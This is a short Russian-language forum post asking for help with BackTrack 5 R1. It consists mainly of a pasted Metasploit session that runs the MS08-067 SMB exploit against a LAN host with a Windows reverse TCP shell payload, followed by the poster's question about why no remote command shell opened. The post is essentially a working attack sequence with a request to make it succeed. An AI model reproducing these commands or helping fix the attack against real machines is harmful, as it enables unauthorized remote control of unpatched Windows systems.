Рубрики:
Тема: "Подскажите по поводу BACKTRACK 5 R1 ?."
=[ Metasploit v4.2.0-release [core:4.2 api:1.0]
+ ----=[ 805 exploits - 451 auxiliary - 135 post
+ ----=[ 246 payloads - 27 encoders - 8 nops
=[ svn r14805 updated yesterday (2012.02.23)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.1.2
rhost => 192.168.1.2
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.1.36
lhost => 192.168.1.36
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.36:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
- если не ошибаюсь тут должно появиться CMD (КОМАНДНАЯ СТРОКА) от удалённого ПК
что я пропустил или где я ошибся?